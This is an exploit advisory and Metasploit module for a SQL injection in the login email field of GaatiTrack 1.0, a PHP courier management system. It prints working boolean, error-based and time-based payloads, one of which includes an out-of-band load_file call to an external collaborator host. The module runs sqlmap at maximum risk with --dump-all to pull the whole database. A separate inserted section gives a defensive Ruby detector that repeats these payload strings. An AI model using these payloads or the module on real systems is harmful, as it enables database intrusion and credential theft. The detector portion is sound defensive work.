# Title: GaatiTrack-1.0 Copyright©2025-Multiple-SQLi - Metasploit module
# Author: nu11secur1ty
# Date: 10/06/2025
# Vendor: https://www.mayurik.com/
# Software: https://www.sourcecodester.com/php/16848/best-courier-management-system-project-php.html
# Reference: https://portswigger.net/web-security/sql-injection
## Description:
The `email` parameter appears to be vulnerable to SQL injection attacks. The payload `'+(select load_file('\\\\geyz33s0w543jnmhknwp9j5oefk9822qtthl4bs0.oastify.com\\okf'))+'` was submitted in the `email` parameter. This payload injects a SQL sub-query that calls MySQL's `load_file` function with a UNC file path that references a URL on an external domain. The application interacted with that domain, indicating that the injected SQL query was executed.
STATUS: HIGH-CRITICAL Vulnerability
[+]Payload:
- SQLi:
```SQLi
---
Parameter: email (POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause (subquery - comment)
Payload: email=cnbkCuPP@burpcollaborator.net'+(select load_file('\\\\geyz33s0w543jnmhknwp9j5oefk9822qtthl4bs0.oastify.com\\okf'))+'' AND 3077=(SELECT (CASE WHEN (3077=3077) THEN 3077 ELSE (SELECT 5162 UNION SELECT 5005) END))-- -&password=r5I!g0t!W9
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: email=cnbkCuPP@burpcollaborator.net'+(select load_file('\\\\geyz33s0w543jnmhknwp9j5oefk9822qtthl4bs0.oastify.com\\okf'))+'' AND (SELECT 5507 FROM(SELECT COUNT(*),CONCAT('qkqqq',(SELECT (ELT(5507=5507,1))),'qxxpq',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- YcNj&password=r5I!g0t!W9
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: email=cnbkCuPP@burpcollaborator.net'+(select load_file('\\\\geyz33s0w543jnmhknwp9j5oefk9822qtthl4bs0.oastify.com\\okf'))+'' AND (SELECT 2855 FROM (SELECT(SLEEP(11)))jpbI)-- jtuB&password=r5I!g0t!W9
---
```
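Added example (not part of the original advisory or the author's module): a Ruby triage script that flags the techniques listed above when they appear in the `email` field of a form-encoded login body. The indicator regexes, the `EMAIL_SHAPE` allow-list, the `scan_login_body` helper and the sample values (with the placeholder host `oob.example`) are assumptions constructed for illustration.

```ruby
require 'uri'

# Indicators named after the techniques in the listing above; each is matched
# against the URL-decoded email value. Heuristics for log triage, not a WAF.
SQLI_INDICATORS = {
  oob_load_file: /load_file\s*\(\s*['"]\\{2,}/i, # load_file() on a UNC path
  boolean_blind: /\b(?:and|or)\s+\d+\s*=\s*\(\s*select\b/i,
  error_based:   /information_schema\.|floor\s*\(\s*rand\s*\(/i,
  time_based:    /\bsleep\s*\(/i,
  comment_tail:  /--(?:\s|\z)/
}.freeze

# Assumed allow-list shape for a login email (hypothetical policy).
EMAIL_SHAPE = /\A[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}\z/

# Constructed sample values for the email field (not captured traffic).
SAMPLE_EMAILS = <<~'EOS'.lines(chomp: true)
  courier.admin@example.com
  a@example.com'+(select load_file('\\\\oob.example\\okf'))+'
  a@example.com' AND 3077=(SELECT (CASE WHEN (3077=3077) THEN 3077 ELSE 1 END))-- -
  a@example.com' AND (SELECT COUNT(*),FLOOR(RAND(0)*2) x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)-- x
  a@example.com' AND (SELECT 1 FROM (SELECT(SLEEP(11)))t)-- x
EOS

# Returns indicator names for every `email` field in a form-encoded POST body.
def scan_login_body(body)
  emails = URI.decode_www_form(body).select { |k, _| k == 'email' }.map(&:last)
  return [:missing_email] if emails.empty?

  emails.flat_map do |value| # duplicate email keys are all inspected
    hits = SQLI_INDICATORS.select { |_, re| value.match?(re) }.keys
    hits << :not_email_shaped unless value.match?(EMAIL_SHAPE)
    hits
  end.uniq
rescue ArgumentError # non-ASCII body or invalid byte sequence after decoding
  [:undecodable_body]
end

if __FILE__ == $PROGRAM_NAME
  SAMPLE_EMAILS.each do |email|
    body = URI.encode_www_form('email' => email, 'password' => 'x')
    puts format('%-40.40s %p', email, scan_login_body(body))
  end
end
```

A match is a signal for review of the request and its source; the fix for the flaw itself is a parameterized query for the login lookup.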
[+]MSF exploit:
```rb
##
# gaati.rb
#
# Author: nu11secur1ty
# Description: gaati-sqli
##
class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(
      'Name' => 'gaati',
      'Description' => 'gaati-sqli',
      'Author' => ['nu11secur1ty'],
      'License' => MSF_LICENSE
    )
    register_options(
      [
        OptString.new('RAW_REQUEST', [ true, 'Raw HTTP request (from Burp)', '' ]),
        OptString.new('SQLMAP_PATH', [ false, 'Full path to sqlmap.py', '/home/kali/sqlmap-nu11secur1ty/sqlmap.py' ])
      ]
    )
  end

  def run
    raw_request = datastore['RAW_REQUEST']
    sqlmap_path = datastore['SQLMAP_PATH'] || '/home/kali/sqlmap-nu11secur1ty/sqlmap.py'
    if raw_request.nil? || raw_request.empty?
      print_error("RAW_REQUEST is empty — will attempt to use system exploit.txt if present.")
    end
    # Prefer system exploit.txt in MSF module dir (no need to cat)
    system_exploit = '/usr/share/metasploit-framework/modules/auxiliary/MSF/exploit.txt'
    use_file = nil
    if File.exist?(system_exploit)
      use_file = system_exploit
      print_good("Using existing exploit file: #{use_file}")
    else
      # fallback: write to user-writable home dir
      exploit_dir = File.join(Dir.home, ".msf_exploits")
      Dir.mkdir(exploit_dir) unless Dir.exist?(exploit_dir)
      timestamp = Time.now.strftime("%Y%m%d%H%M%S")
      tmp_file = File.join(exploit_dir, "exploit_#{timestamp}.txt")
      if raw_request.nil? || raw_request.empty?
        print_error("No RAW_REQUEST provided and no system exploit.txt found — nothing to do.")
        return
      end
      begin
        File.open(tmp_file, "w") { |f| f.write(raw_request) }
        print_good("Saved RAW_REQUEST -> #{tmp_file}")
        use_file = tmp_file
      rescue Errno::EACCES => e
        print_error("Cannot write temp exploit file: #{e}")
        return
      rescue => e
        print_error("Failed to save temp request: #{e}")
        return
      end
    end
    unless File.exist?(sqlmap_path)
      print_error("sqlmap.py not found at #{sqlmap_path}. Set SQLMAP_PATH option to correct path.")
      # do not delete the temp file so user can inspect
      return
    end
    sqlmap_cmd = [
      "python3",
      sqlmap_path,
      "-r", use_file,
      "--no-cast",
      "--no-escape",
      "--dbms=mysql",
      "--time-sec=11",
      "--random-agent",
      "--level=5",
      "--risk=3",
      "--batch",
      "--flush-session",
      "--technique=TBEUSQ",
      "--union-char=UCHAR",
      '--answers="crack=Y,dict=Y,continue=Y,quit=N"',
      "--dump-all"
    ].join(" ")
    print_status("Executing sqlmap: #{sqlmap_cmd}")
    begin
      system(sqlmap_cmd)
      print_good("sqlmap finished (check output above)")
    rescue => e
      print_error("Failed to execute sqlmap: #{e}")
    ensure
      # delete tmp file if we created it
      if use_file != system_exploit
        begin
          File.delete(use_file) if File.exist?(use_file)
          print_status("Deleted temporary file #{use_file}")
        rescue => e
          print_warning("Could not delete temporary file: #{e}")
        end
      end
    end
  end
end
```
# Reproduce:
[href](https://www.patreon.com/posts/gaatitrack-1-0-140566642)
# Buy an exploit only:
[href](https://www.patreon.com/posts/gaatitrack-1-0-140566642)
# Time spent:
01:15:00
--
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at https://packetstormsecurity.com/ https://cve.mitre.org/index.html
https://cxsecurity.com/ and https://www.exploit-db.com/
home page: https://www.asc3t1c-nu11secur1ty.com/
nu11secur1ty <https://www.asc3t1c-nu11secur1ty.com/>